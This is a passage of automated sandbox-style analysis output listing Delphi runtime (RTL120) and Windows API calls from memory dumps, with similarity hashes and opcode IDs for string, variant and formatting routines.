                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  APIs
                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 5000439E
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 500043A4
                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 500043B3
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 500043C4
                                                                                                  • @System@@WStrFromWArray$qqrr17System@WideStringpbi.RTL120(00000105,?), ref: 500043D4
                                                                                                  APIs
                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 5000ABCF
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 5000ABD5
                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 5000ABE4
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 5000ABF5
                                                                                                  • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000105,?), ref: 5000AC05
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50027DED,?,?,00000002,00000003), ref: 50027D20
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50027DED,?,?,00000002,00000003), ref: 50027D56
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50027DED,?,?,00000002,00000003), ref: 50027DA8
                                                                                                  • @Sysutils@NextCharIndex$qqrx20System@UnicodeStringi.RTL120(00000000,50027DED,?,?,00000002,00000003), ref: 50027DC5
                                                                                                  APIs
                                                                                                  • @Variants@@DispInvoke$qp8TVarDatarx8TVarDatap16System@TCallDescpv.RTL120(?,?,?,?), ref: 500310E2
                                                                                                  • VariantInit.OLEAUT32(?), ref: 50031100
                                                                                                  • @Variants@FindCustomVariantType$qqrxusrp27Variants@TCustomVariantType.RTL120(00000000,500311B4,?,?), ref: 50031166
                                                                                                  • @Variants@VarInvalidOp$qqrv.RTL120(00000000,500311B4,?,?), ref: 50031186
                                                                                                  • @Variants@@VarCopy$qqrr8TVarDatarx8TVarData.RTL120(500311BB,?), ref: 500311A6
                                                                                                  • @Variants@@VarClear$qqrr8TVarData.RTL120(500311BB,?), ref: 500311AE
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028208), ref: 5002814F
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028208), ref: 50028179
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50028208), ref: 500281B2
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50028208), ref: 500281DF
                                                                                                  APIs
                                                                                                  • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxirx24Sysutils@TFormatSettings.RTL120(?,?,?,?), ref: 5001F7D8
                                                                                                  • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(?,?,?,?), ref: 5001F7F3
                                                                                                  • @System@@WStrClr$qqrpv.RTL120 ref: 5001F812
                                                                                                    • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F81B
                                                                                                    • Part of subcall function 50009C30: @System@@NewWideString$qqri.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C40
                                                                                                    • Part of subcall function 50009C30: @System@Move$qqrpxvpvi.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C6E
                                                                                                  • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxirx24Sysutils@TFormatSettings.RTL120(?,?,?,?), ref: 5001F845
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F85A
                                                                                                  APIs
                                                                                                  • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxi.RTL120(?,?,?), ref: 5001F6F0
                                                                                                  • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(?,?,?), ref: 5001F70B
                                                                                                  • @System@@WStrClr$qqrpv.RTL120 ref: 5001F72A
                                                                                                    • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F733
                                                                                                    • Part of subcall function 50009C30: @System@@NewWideString$qqri.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C40
                                                                                                    • Part of subcall function 50009C30: @System@Move$qqrpxvpvi.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C6E
                                                                                                  • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxi.RTL120(?,?,?), ref: 5001F759
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F76E
                                                                                                  Similarity
                                                                                                  • API ID: System@Wide$System@@$Buf$qqrpvuipxvuipx14FormatLength$qqrr17RecxiStringiSysutils@$CharClr$qqrpvFreeFromLen$qqrr17Move$qqrpxvpviStringString$qqriStringpbi
                                                                                                  • String ID:
                                                                                                  • API String ID: 4105650016-0
                                                                                                  • Opcode ID: 10139ca0b291b8347723082711ce525d742fa5c123425f79956b6c0e53db1538
                                                                                                  • Instruction ID: 0f111183127a4ac1b74a776fd40eab0f620fc160a94f9ed32ff36730c38c6e24
                                                                                                  • Opcode Fuzzy Hash: 10139ca0b291b8347723082711ce525d742fa5c123425f79956b6c0e53db1538
                                                                                                  • Instruction Fuzzy Hash: FF315E75F05549ABEB00CEADDD8199EB3F9EF58210B5082B6E904E7390DA70EE41CB90
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 5002776B
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277A2
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277D2
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277F8
                                                                                                  Similarity
                                                                                                  • API ID: AnsiFromStr$qqrr20StringStringx27System@System@%System@@T$us$i0$%Unicode$Internal
                                                                                                  • String ID:
                                                                                                  • API String ID: 2707610650-0
                                                                                                  • Opcode ID: e7a70c3558bd8af8c47607f7dc99d6952102971f24995eeed80e251423e86636
                                                                                                  • Instruction ID: 200609d8e3b54832c1637fbc2b58139f495729bdf34ff5c0e14a03cdfe71e056
                                                                                                  • Opcode Fuzzy Hash: e7a70c3558bd8af8c47607f7dc99d6952102971f24995eeed80e251423e86636
                                                                                                  • Instruction Fuzzy Hash: 1F31D730A06187EF9F11DFB8EB169BEB3F6EF402007A086A5D508D7155EB70DE42D681
                                                                                                  APIs
                                                                                                  • @System@@PCharLen$qqrpc.RTL120(?,?,00000000,?,5002A1CB), ref: 50029C6A
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,5002A1CB), ref: 50029C7E
                                                                                                  • @System@@GetMem$qqri.RTL120(0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,5002A1CB), ref: 50029C91
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 50029CA7
                                                                                                  • CharUpperBuffW.USER32(?,00000000,0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000), ref: 50029CAE
                                                                                                  • @System@@FreeMem$qqrpv.RTL120(?,00000000,0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000), ref: 50029CDD
                                                                                                  Similarity
                                                                                                  • API ID: Char$System@@$ByteMultiWide$BuffFreeLen$qqrpcMem$qqriMem$qqrpvUpper
                                                                                                  • String ID:
                                                                                                  • API String ID: 1645325746-0
                                                                                                  • Opcode ID: 21fe9afe1a4d83a0676da24a77eaaefb3b218fec0eebcba249eb9c961a3e5a99
                                                                                                  • Instruction ID: f7199de9386b15250c3ec5562f9d3cd908530842460295cde10b401094cd2a77
                                                                                                  • Opcode Fuzzy Hash: 21fe9afe1a4d83a0676da24a77eaaefb3b218fec0eebcba249eb9c961a3e5a99
                                                                                                  • Instruction Fuzzy Hash: C51129127832D62BFB302079BC92BFB66C9C7422A0FE50336F644D72C1D8444C0162E4
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120(?,?,?,5000B069), ref: 5000B0D3
                                                                                                  • @System@@WStrAddRef$qqrr17System@WideString.RTL120(?,?,?,5000B069), ref: 5000B0E2
                                                                                                  • @System@@AddRefArray$qqrv.RTL120(?,?,?,?,5000B069), ref: 5000B10E
                                                                                                  • @System@@AddRefRecord$qqrv.RTL120(?,?,?,?,5000B069), ref: 5000B124
                                                                                                  • @System@@IntfAddRef$qqrx45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5000B069), ref: 5000B134
                                                                                                  • @System@@DynArrayAddRef$qqrv.RTL120(?,?,?,5000B069), ref: 5000B143
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$ArrayArray$qqrvDelphiInterface$t17Interface%IntfRecord$qqrvRef$qqrpvRef$qqrr17Ref$qqrvRef$qqrx45StringSystem@%Wide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2012329709-0
                                                                                                  • Opcode ID: f4ec387a1cd11effdb45d4b7d2cd1ee05245cfe1110f8ce66fbe9255a9397f64
                                                                                                  • Instruction ID: 6d55af36f0b63116c874578287824143ce439da2b530ab690ffda4e0f3d9c361
                                                                                                  • Opcode Fuzzy Hash: f4ec387a1cd11effdb45d4b7d2cd1ee05245cfe1110f8ce66fbe9255a9397f64
                                                                                                  • Instruction Fuzzy Hash: 2921A431284EC447F621B74CECB2BE7B3D1EB663143D04B26E9918B219D664AC4396A5
                                                                                                  APIs
                                                                                                  • @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 50009281
                                                                                                  • @System@@ReallocMem$qqrrpvi.RTL120(?,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 5000929E
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092B7
                                                                                                  • @System@@NewAnsiString$qqrius.RTL120(?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092C8
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092E0
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092E7
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiClr$qqrpvSystem@$FromMem$qqrrpviMove$qqrpxvpviReallocStr$qqrr27StringString$qqriusStringusSystem@%T$us$i0$%x20Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2700304443-0
                                                                                                  • Opcode ID: 8ea68c66dfcedd19741d309cb17a95da812b4b11250355e603ccff5346edb9f3
                                                                                                  • Instruction ID: 19fd1448c94dc337e7dea5b0d8d868d31cbff661868f48eb09bfe7f6c9d98fa6
                                                                                                  • Opcode Fuzzy Hash: 8ea68c66dfcedd19741d309cb17a95da812b4b11250355e603ccff5346edb9f3
                                                                                                  • Instruction Fuzzy Hash: BB1108317016905BFF459A5D9CA4B1EF3EAAFE16017E4427AE504CB369DEB0CC01C396
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002482B), ref: 500247B6
                                                                                                  • @Sysutils@NextCharIndex$qqrx20System@UnicodeStringi.RTL120(00000000,5002482B), ref: 500247E6
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5002482B), ref: 500247F4
                                                                                                    • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,5002482B), ref: 500247F9
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@$StringSystem@@$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$CharEnsureIndex$qqrx20Len$qqrx20NextString$qqrr20StringiSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3710370719-0
                                                                                                  • Opcode ID: 8b75fbade8f57a9a3d3cff76574fc1a2f37bac70cd31005b4f4dbd189082e660
                                                                                                  • Instruction ID: c71702f12b748d452bae67db58d8c73811d6ffb118b8ba3891e4b339e8c778a6
                                                                                                  • Opcode Fuzzy Hash: 8b75fbade8f57a9a3d3cff76574fc1a2f37bac70cd31005b4f4dbd189082e660
                                                                                                  • Instruction Fuzzy Hash: ED21E43091A0DAEFDB91DBA8E8525ADB3F4EF06710B6107A2ED10D7261D3705E01E792
                                                                                                  APIs
                                                                                                  • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                  • @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                  • @System@@NewUnicodeString$qqri.RTL120(00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A137
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A151
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A158
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 5002E45A
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5002E4EB), ref: 5002E487
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(?,00000000,5002E4EB), ref: 5002E4A5
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 5002E4C7
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5002E4D0
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5002E4F2), ref: 5002E4E5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(00000000,5001C6EA), ref: 5001C675
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                    • Part of subcall function 5001C3F4: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                    • Part of subcall function 5001C3F4: @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C6EA), ref: 5001C699
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @Sysutils@IsDelimiter$qqrx20System@UnicodeStringt1i.RTL120(00000000,5001C6EA), ref: 5001C6BA
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C6EA), ref: 5001C6CF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @Sysutils@TEncoding@GetByteCount$qqrx20System@UnicodeString.RTL120(00000000,5002D979), ref: 5002D90D
                                                                                                    • Part of subcall function 5002D5A8: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002D61B), ref: 5002D5E1
                                                                                                    • Part of subcall function 5002D5A8: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002D61B), ref: 5002D5F4
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(00000000,00000000,5002D979), ref: 5002D922
                                                                                                    • Part of subcall function 5000C0F4: @System@DynArraySetLength$qqrrpvpvipi.RTL120 ref: 5000C0F9
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5002D942
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @Sysutils@TEncoding@GetBytes$qqrx20System@UnicodeStringiir25System@%DynamicArray$tuc%i.RTL120(00000000,?,?), ref: 5002D95E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000AA77), ref: 5000AA22
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000AA77), ref: 5000AA46
                                                                                                  • @System@@WriteLString$qqrr15System@TTextRecx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,5000AA77), ref: 5000AA52
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5000AA7E), ref: 5000AA69
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026E08), ref: 50026D9A
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50026E08), ref: 50026DA9
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000002,?,00000000,50026E08), ref: 50026DD4
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000002,?,00000000,50026E08), ref: 50026DE3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021ACE), ref: 50021A70
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50021ACE), ref: 50021A92
                                                                                                  • @Sysutils@FloatToTextFmt$qqrpbpxv20Sysutils@TFloatValuet1rx24Sysutils@TFormatSettings.RTL120(?,00000000,00000000,50021ACE), ref: 50021AA4
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50021ACE), ref: 50021AB3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021C26), ref: 50021BC8
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50021C26), ref: 50021BEA
                                                                                                  • @Sysutils@FloatToTextFmt$qqrpbpxv20Sysutils@TFloatValuet1rx24Sysutils@TFormatSettings.RTL120(?,00000000,00000000,50021C26), ref: 50021BFC
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50021C26), ref: 50021C0B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002F450
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F46F
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002F4C9), ref: 5002F486
                                                                                                  • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002F4C9), ref: 5002F49A
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F4A6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021A22), ref: 500219C5
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50021A22), ref: 500219E7
                                                                                                  • @Sysutils@FloatToTextFmt$qqrpbpxv20Sysutils@TFloatValuet1.RTL120(00000000,00000000,50021A22), ref: 500219F8
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50021A22), ref: 50021A07
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021B7A), ref: 50021B1D
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50021B7A), ref: 50021B3F
                                                                                                  • @Sysutils@FloatToTextFmt$qqrpbpxv20Sysutils@TFloatValuet1.RTL120(00000000,00000000,50021B7A), ref: 50021B50
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50021B7A), ref: 50021B5F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@TObject@Free$qqrv.RTL120(?,?,5002EA37,00000000,5002EB85), ref: 5002728E
                                                                                                  • @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D0
                                                                                                  • @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D9
                                                                                                  • @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(5002EA37,00000000,5002EB85), ref: 500272E4
                                                                                                  • @System@ExceptAddr$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272ED
                                                                                                  • @System@ExceptObject$qqrv.RTL120(00000000,5002EA37,00000000,5002EB85), ref: 500272F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,500307EF), ref: 5003078A
                                                                                                    • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                    • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                    • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                  • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,500307EF), ref: 5003079E
                                                                                                    • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391FF
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000001,?,00000000,500307EF), ref: 500307BB
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
